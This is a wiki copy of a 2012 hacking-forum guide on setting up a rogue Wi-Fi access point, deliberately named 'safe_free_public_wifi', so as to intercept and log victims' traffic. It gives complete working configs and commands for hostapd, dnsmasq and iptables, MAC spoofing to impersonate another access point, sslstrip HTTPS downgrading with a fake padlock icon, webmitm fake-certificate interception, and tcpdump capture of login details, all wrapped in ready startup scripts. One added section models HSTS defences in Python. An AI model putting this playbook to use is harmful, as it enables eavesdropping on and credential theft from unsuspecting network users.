Dsniff/PlasticForkGuide HackBB
From charlesreid1
Setting Up a Wifi Access Point and Dealing With SSL
Author: plasticFork
Date Released: 4/20/2012 - On HackBB.
Introduction
This guide is about setting up a wireless access point and then recording all traffic that passes through it, including two ways of dealing with SSL. It was written for Linux, but the basic principle applies to other platforms like BSD; only some of the commands will differ (BSD has no iptables, for example). There are more advanced things you could do, like modifying the traffic passing through, but I won't go into that. This is an alternative to ARP poisoning and achieves pretty much the same thing, or, to be precise, the same state of affairs: traffic being passed through your machine. There are plenty of guides around for ARP poisoning but not so many for setting up access points. The parts about dealing with SSL traffic and logging traffic work exactly the same for ARP poisoning.
Hardware requirements
A wireless card for the access point and another network card for forwarding traffic to the internet. The second one can be either an ethernet or a wireless connection; they both work the same.
I'm not sure how "new" is "new", so you may have to do your own research to see if your wireless card is compatible. "All new mac80211 based drivers that implement AP functionality are supported with hostapd's nl80211 driver." http://linuxwireless.org/en/users/Documentation/hostapd
Setting up the AP
hostapd for turning the wireless card into an access point
dnsmasq for dhcp
iptables for NAT
Traffic monitoring
Option one
sslstrip
tcpdump
Option two
webmitm (dsniff)
ssldump
Setting up the AP
First things first: you need to connect your Linux box to the internet. As mentioned before, an ethernet or wireless connection both work just fine. If you go the wireless route you'll need two network cards, one for the access point and one for the connection to the internet. The same card can't do both; that might sound obvious, but you'd be surprised. For the rest of this guide eth0 will be the interface connected to the internet. It's important you do this first; I had problems setting up the access point and then connecting to the internet afterwards.
Configuring stuff
hostapd
(host access point daemon)
This is the program that will turn your wireless card into an access point (I'll be using wlan0 for that). This is where you decide your network's SSID, encryption and password.
hostapd is configured with a file called /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=safe_free_public_wifi
channel=8
wpa=3
wpa_passphrase=secret_password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
hw_mode=g
You can leave off the four wpa... lines and it will just be an open access point with no password.
dnsmasq
This program will automatically assign IP addresses to the computers connecting to your AP. Without it the clients would need to set their own IP addresses, which is not very Windows friendly.
dnsmasq is configured with a file called /etc/dnsmasq.conf
The important fields to have in this file are
interface=wlan0
dhcp-range=192.168.0.50,192.168.0.150,12h
dhcp-option=3,192.168.0.1
Note that the IP address in the third line needs to be the IP of the access point, which we'll set later. 192.168.0.1 is a good one.
iptables
This will forward traffic from wlan0 to eth0. Replace eth0 with your internet-facing interface. If you're unfamiliar with iptables, you can run these five lines individually from the terminal or put them into a text file and run it with "bash <filename>". We'll be putting all the required lines into a text file like this later on for simple startup/shutdown of the access point. The iptables commands stack together, so you can add even more later. To clear all the current rules use iptables -F
iptables -F
iptables -t nat -F
iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Start up wlan0
I think assigning a specific IP address to wlan0 is important, since I ran into trouble when I didn't. The industry standard is to use 192.168.x.x for internal IP addresses; I'll just use 192.168.0.1. This is also the time to set the access point's MAC address, either for anonymity reasons or to impersonate another access point. If you're making up your own MAC address, make sure the first block is even, i.e. 10, 12, 14 ... 1A, 1C, 1E.
ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 hw ether 10:11:12:13:14:15
or simply, without the MAC foolery:
ifconfig wlan0 192.168.0.1 netmask 255.255.255.0
Dealing with SSL
Of course you don't *have* to deal with SSL traffic; you can just ignore it. But here are two ways of dealing with it.
Method 1 sslstrip
The least conspicuous option. It essentially redirects https traffic to http. The user may notice that a website does not say https in the address bar when it should, and the browser may warn that the user is submitting unencrypted data, so it's not completely invisible. However, these are things most users ignore...
sslstrip is written in Python, so there's no need to compile it or find a precompiled binary. You can download it here: www.thoughtcrime.org/software/sslstrip/
There is no need to configure sslstrip itself, but you will need an extra iptables rule. All traffic bound for port 80 needs to be redirected to a port that sslstrip is listening on. Then sslstrip will do its magic.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
Then run it with
python sslstrip.py -l 9000 -f lock.ico
You can leave out the -f lock.ico. This is a cheap padlock favicon that will display in the victim's browser when they try to visit an https site (and sslstrip redirects it to the http version). Cute, but it could also raise extra suspicion, so use your own judgement. Note that this does not work against every website; torproject.org, for example, is unaffected. Also, this trumps the HTTPS Everywhere add-on.
Method 2 full fat man in the middle
This means generating a fake certificate and using it to encrypt/decrypt all SSL traffic. It's not as hard as it sounds, but it comes with the major disadvantage that if you're making your own certificate, web browsers like Firefox will flag it to the user and force them through a painstaking "add security exception" screen, which is not very subtle at all and will frankly fail with a lot of targets. To do this we need an iptables rule, a program called ssldump and a program called webmitm, which is part of a package called dsniff.
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
Then run it with
webmitm -d
You'll be guided through making a certificate. The less believable your answers, the less believable your certificate.
ssldump -n -d -k webmitm.crt >> ssldump.log
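The reason some sites are unaffected by both methods, as an added note that is not part of the original guide: a browser that holds an HTTP Strict Transport Security (HSTS, RFC 6797) policy for a host rewrites plain http URLs to https before any request leaves the machine, so a downgrade proxy never sees a request to rewrite, and for that host it also refuses the "add security exception" path on a certificate error. The Python below is example code added here (not from the guide, dsniff or sslstrip; the hostnames it is exercised with are constructed) modelling that browser-side decision.

```python
"""Browser-side HSTS decision (RFC 6797, simplified).

Added illustration, not part of the original guide: a browser that holds a
Strict-Transport-Security policy for a host rewrites http:// URLs to https://
before sending anything, so a downgrade proxy on the path never sees a
plaintext request it could rewrite.
"""
import re
import time
from urllib.parse import urlsplit, urlunsplit

_MAX_AGE = re.compile(r'max-age\s*=\s*"?(\d+)"?', re.IGNORECASE)


class HstsCache:
    def __init__(self, preload=()):
        # host -> (expiry_epoch, include_subdomains); preloaded hosts never expire
        self._entries = {h.lower(): (float("inf"), True) for h in preload}

    def observe(self, host, header_value, now=None):
        """Record an STS header; browsers only honour it over an error-free TLS
        connection, so a header seen in a stripped (plain http) session is ignored."""
        now = time.time() if now is None else now
        m = _MAX_AGE.search(header_value)
        if not m:
            return  # malformed directive: ignore
        max_age = int(m.group(1))
        if max_age == 0:
            self._entries.pop(host.lower(), None)  # max-age=0 clears the policy
            return
        include_sub = "includesubdomains" in header_value.lower()
        self._entries[host.lower()] = (now + max_age, include_sub)

    def is_known(self, host, now=None):
        """True if host, or a parent with includeSubDomains, has a live policy."""
        now = time.time() if now is None else now
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self._entries.get(".".join(labels[i:]))
            if entry and entry[0] > now and (i == 0 or entry[1]):
                return True
        return False

    def rewrite(self, url, now=None):
        """Return the URL the browser would actually request."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known(parts.hostname or "", now):
            return url
        netloc = parts.netloc[:-3] if parts.netloc.endswith(":80") else parts.netloc
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))
```

Only a client's very first visit to a host that is not in the preload list goes out over plain http, which is the window sslstrip relies on.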
Recording traffic
There are plenty of guides on how to do this with wireshark, tshark (wireshark cli if you're not running X) and tcpdump.
Here's a quick example of using tcpdump
tcpdump -i wlan0 -s 0 -Apnq >> logfile
-i wlan0 is the interface to listen on. You could also use eth0, but that would also capture packets originating from the machine the AP is running on.
-s 0 sets the snapshot length so that whole packets are captured instead of the default truncated amount per packet.
-A outputs the data in ASCII, which is useful if you're sniffing for login details.
-p prevents the card from entering promiscuous mode. This might not be needed, but we don't want to pick up traffic from other nearby access points.
-n and -q just leave out some information we're not interested in (-n skips address-to-name lookups, -q gives shorter protocol output).
There are also other tools available which will listen and parse out passwords and other interesting things automatically. I'll admit I'm rather immaturely motivated by watching all of my victims' traffic, not just the passwords.
Startup/Shutdown Script
Script the startup and shutdown:
#!/bin/bash
ifconfig wlan0 192.168.0.1 netmask 255.255.255.0
dnsmasq
iptables -F
iptables -t nat -F
iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
hostapd -d /etc/hostapd/hostapd.conf &
For sslstrip
#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
python sslstrip.py -l 9000 -f lock.ico &
tcpdump -i wlan0 -s 0 -Apnq >> /home/plasticFork/logfile &
for webmitm
#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
webmitm -d
ssldump -n -d -k webmitm.crt >> ssldump.log &
And here's a bring-down script:
#!/bin/bash
ifconfig wlan0 down
killall dnsmasq
iptables -F
killall hostapd
killall sslstrip
killall tcpdump
killall webmitm
killall ssldump